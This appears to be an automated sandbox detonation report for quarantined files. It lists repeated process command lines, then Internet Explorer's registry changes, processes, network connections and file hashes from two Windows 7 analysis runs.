"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

Network

N/A

Files

memory/1848-0-0x000000007408E000-0x000000007408F000-memory.dmp

memory/1848-1-0x0000000000170000-0x00000000002E0000-memory.dmp

memory/1848-3-0x0000000074080000-0x000000007476E000-memory.dmp

memory/1848-4-0x000000007408E000-0x000000007408F000-memory.dmp

memory/1848-5-0x0000000074080000-0x000000007476E000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20241010-en

Max time kernel

119s

Max time network

128s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\ninite22.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D47E2601-F49B-11EF-8CE5-7A300BFEC721} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000637e6a747cf93644957c7233b516f62e000000000200000000001066000000010000200000008829dad02779f8ca5e9034bc44b86f7867a46dde2cd60b8dfc9fadded51901c2000000000e8000000002000020000000bfc849fe4b9c8824d3adb611e97a5f13d143dd5d0378e132062c6cd937fd69cf90000000818d045b3d7c88ddd2297192a3b62a13ecc411159a58532026f1dfaccf3534d3d3f405173c59b3df6980725a2ff0d95056a82f6b5d18bd18e8bea4abc35299282fe634e74eb65e3b9c45890a6fe29b84b9e4e96007c014f816bed2e8f650368a6513c5755a39fa0bfc076975e242130f8001144e1534c501d9d258709ac297082d9cd622e56085d5b187fdbd3dc2af6340000000c5d7f06aa85055c686a5a7b75b02be66fec9e5831e56a57683ad3ae4923bfa5aeb7eebfb12f39d7db53a3a80c62b62f00dad45684c8bfe383f55a19d629dbd7a C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000637e6a747cf93644957c7233b516f62e00000000020000000000106600000001000020000000970f538f63f570139605d889ba2eb006e930d9f633e09586cc805e0d5eab058f000000000e8000000002000020000000caa4277bceba91bee4b12bbb106e2e35aa9809855e2d5b5f7c8692f2258467da2000000082ccc270abb5ab648d69bfc25b90671f5e761c542e825f96954e1e0bbb1ea5ce40000000d7cb9b96230e5a2d459de91d460b127ca275ccec10a7bfdfab3478d9eaa9d190a1b1262a740b88b6e2a17945440d929948c3ab582767f6054b016ec1afc97f16 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 301314a9a888db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446775427" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\ninite22.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2172 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Cab7AFD.tmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\Local\Temp\Tar7C0D.tmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 31e7ff7e01cddb199dae6453e81243b0
SHA1 c25c50aaa020687733449c8065c710bb038d6cc3
SHA256 57100b4f465a59f9bde56dc665230d987ad3c081dc6b803e2525db134df617f1
SHA512 f171760c36b3bc06c6471e0c9a1294bb4b28e880f1abecd78f50802ab576bd6d3c0f635c6430231e2caecfcc0b9373eed02441abab347fd411c61b9a4a669b7e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e0dae95e4c218c26aee833e6c60f50bd
SHA1 1eb15a29a9b63b1dd8510acc96281e721f491ae8
SHA256 137bf9120286fff62f98c71139269a56d67639590e4114bad22600dafa9c1226
SHA512 1833ee1231a9f06bdeee4215f1ee2751d94dd854823625a44ea211766bab4676dd9d66741214b63e6403e712c78fb454c8bc17216cb068fda6a0e4a2faabed00

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bed040b42219d6da980a7ce2dcc75480
SHA1 bf0a51b22935f974c9d77170b738b9d91d280e07
SHA256 7cfd73eb18cf7e441338a99ebedc71f3bc7f946a59a3249c5f9cb4a6edb64368
SHA512 2c9ef94b902fcc4d08439a30da157df52b0f2ca16e877dcdaa222d68241beb6f4608c662b41401426823f85e4ea63e1f6285c2401f2c105fba976dd216526778

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 de7092dae5f90cb6a961e732411d2d76
SHA1 c4c0baeefad311aeb9ca9d430dedbd1a530b64e2
SHA256 906670016d935dfdc15d61f7c079b2558aa84f883fe2dc513721a78d6d0e341c
SHA512 afabfd43b7d82b447385bc9b107ed8e6202fb83bcbab65dc8be6c2f6b6a20835b10a234a13665f5e97839d6e85559992e45a229311e83bb1b18e058053213582

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 18ebcb25ae5433bf7fce20ad724af886
SHA1 faf429d0e50935c1e1ad02dac1da44c2580ecc4a
SHA256 94395c6e28b721d5509f6b169e0490ea6afe521a281ed30c6d362577fc93f05a
SHA512 4c6a2926d9a2a2727e82efef492aa95eb20640e899575a1e89823dff90f68b1838bdc7e7da60eda477e7a9f27c771e93d434aa68229b2b0988188d236808ea74

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 940f42480acf1c73d4762352a9fdf251
SHA1 1f4937bfd70180eab1ffe536388bbba2cb214f49
SHA256 3c5666a9f04b73e63cc648c538a8838c8317db39f7397cee06932efef7f9b60d
SHA512 078eacd6b6296d727bbb75ed4d64a6f0dbae445386e36f5199ed01d78a54b50be142fd2868977ea83b1e3bb38ae520b44272130c155a444fd1fc2cc24cc63df3

Analysis: behavioral11

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20240903-en

Max time kernel

132s

Max time network

128s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\IxZcQMy.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D5157C31-F49B-11EF-AC61-4E0B11BE40FD} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 109b97a9a888db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446775428" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c5b2a80a52aa2e43a57d83b55b7203ac0000000002000000000010660000000100002000000015adaa62d5694351fcbd003c87a9c083c6f94f9c9bc0f1b4df4d5b180cb729d2000000000e80000000020000200000003d11fb97aea5ccb6b3cf0a82c18b97d5e6c0b735be73a9fdd2ea905ee72c83a020000000618ffd5ca9a65aa5929f69b52b7ccf2f13a24483351521b6c659a5f6db350e4840000000691ce2491dca97169feecb4f0d2f85085ccee209c2173fe04d38144a6b9d392b834b1a53c1209ea638c2dbedb474b6221213b602cdacbbb4714fbe74898a2c6a C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
